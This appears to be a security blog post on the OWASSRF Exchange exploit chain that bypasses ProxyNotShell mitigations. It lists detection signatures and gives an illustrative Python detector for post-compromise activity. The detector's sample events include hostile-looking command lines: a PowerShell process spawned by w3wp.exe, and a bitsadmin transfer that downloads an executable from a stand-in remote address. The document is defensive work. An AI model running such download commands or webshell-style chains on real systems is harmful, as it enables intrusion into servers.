New Exchange Exploits Exploited in the Wild
December 22, 2022 by Bryson Medlock
Microsoft Exchange has received a lot of attention over the past couple of years due to a series of remote code execution (RCE) vulnerabilities that abuse the way Microsoft’s Internet Information Services (IIS) proxies traffic to the Exchange back end. News came out this week of a new method of exploiting Exchange that bypasses Microsoft’s recommended mitigations for ProxyNotShell (CVE-2022-41040 and CVE-2022-41082). Specifically, the new exploit bypasses the URL rewrite mitigation guidance from Microsoft that we shared back in September; however, the bypass applies only to that mitigation and does not work against systems patched with the November 8, 2022 security update (KB5019758).
This latest exploit, dubbed OWASSRF, was disclosed earlier this week by CrowdStrike. The original ProxyNotShell chain starts with CVE-2022-41040, a server-side request forgery (SSRF) vulnerability in Exchange’s Autodiscover endpoint, which allows an attacker to reach arbitrary URLs on the back end. CVE-2022-41082, an authenticated RCE vulnerability in Exchange, is then used to execute arbitrary PowerShell commands. The new method reaches the back end through a previously undisclosed vulnerability in the Outlook Web Access (OWA) front-end endpoint instead of the Autodiscover endpoint. Microsoft’s earlier URL rewrite mitigation guidance only covered the Autodiscover endpoint, which is why it does not stop this chain.
Security researcher Dray Agha discovered an attacker’s open repository earlier this month, downloaded their tools, and made them available for download via Twitter. A Python script, “poc.py”, was included in the leaked tools and gives us insight into the vulnerability involved. Based on that tool, the latest exploit observed in the wild appears to be related to CVE-2022-41080, which was patched in November.
The CRU has been actively hunting based on the information available and will continue to do so. Many of the TTPs observed in this attack are not new, and existing CRU detection signatures will already detect related post-compromise activity for our partners. Partners using the CW SIEM who send us logs from their Exchange servers will find the following detection signatures in the CRU Collection:
[CRU][Windows] Bitsadmin transfer from remote server
[CRU][Windows] Suspicious w3wp.exe running as parent to powershell or cmd that is running child command processes
We’ve also added the following new signature specifically for CVE-2022-41080:
[CRU][Filebeat] Potential CVE-2022-41080 Exchange Privilege Escalation Exploit
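As an added example of the kind of logic behind the first two signatures above (this is my own illustration, not the CRU’s signature code or any ConnectWise product logic), the following Python runs two detections over a handful of constructed Sysmon-style process creation events. The event records, process IDs and command lines are all made up for the example; the detections look for w3wp.exe spawning a shell that then runs child commands, and for bitsadmin /transfer jobs that pull from a remote http(s) source.

```python
import ntpath
from urllib.parse import urlparse

# Constructed Sysmon-style process creation events (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "MSExchangeOWAAppPool"'},
    {"ProcessId": 5210, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell.exe -NoProfile -Command whoami"},
    {"ProcessId": 5300, "ParentProcessId": 5210,
     "Image": r"C:\Windows\System32\whoami.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "whoami"},
    {"ProcessId": 5400, "ParentProcessId": 5210,
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://203.0.113.10/tool.exe C:\Windows\Temp\tool.exe"},
    # Benign noise: an admin shell from Explorer that only lists local BITS jobs.
    {"ProcessId": 6000, "ParentProcessId": 2000,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
    {"ProcessId": 6100, "ParentProcessId": 6000,
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /list /allusers"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def detect_w3wp_shell_chain(events):
    """Flag shells spawned by the IIS worker process that go on to spawn children.

    w3wp.exe has no business launching an interactive shell; a shell under w3wp
    that then runs further commands is the usual shape of a webshell or
    ProxyNotShell-style RCE. Real Sysmon logs carry ProcessGuid/ParentProcessGuid;
    key on those in production because PIDs are reused.
    """
    children_by_parent = {}
    for ev in events:
        children_by_parent.setdefault(ev["ParentProcessId"], []).append(ev)
    findings = []
    for ev in events:
        if basename(ev["ParentImage"]) == "w3wp.exe" and basename(ev["Image"]) in SHELLS:
            kids = children_by_parent.get(ev["ProcessId"], [])
            if kids:
                findings.append({"shell_pid": ev["ProcessId"],
                                 "shell": basename(ev["Image"]),
                                 "children": [basename(k["Image"]) for k in kids]})
    return findings


def detect_bitsadmin_remote_transfer(events):
    """Flag bitsadmin /transfer jobs whose source argument is a non-local http(s) URL."""
    findings = []
    for ev in events:
        if basename(ev["Image"]) != "bitsadmin.exe":
            continue
        args = ev["CommandLine"].split()
        if not any(a.lower() == "/transfer" for a in args):
            continue
        for a in args:
            url = urlparse(a)
            if url.scheme in ("http", "https") and url.hostname not in (None, "localhost", "127.0.0.1"):
                findings.append({"pid": ev["ProcessId"], "source": a})
                break
    return findings


if __name__ == "__main__":
    print(detect_w3wp_shell_chain(SAMPLE_EVENTS))
    print(detect_bitsadmin_remote_transfer(SAMPLE_EVENTS))
```

On the sample data the first detection returns a single finding for powershell.exe (PID 5210) under w3wp.exe with whoami.exe and bitsadmin.exe as children, and the second returns the one transfer from 203.0.113.10; the Explorer-launched cmd.exe and its bitsadmin /list call produce nothing. Note that these are post-compromise indicators: they fire after code execution has been obtained, which is exactly why they keep working regardless of which front-end path (Autodiscover or OWA) the attacker used to get there.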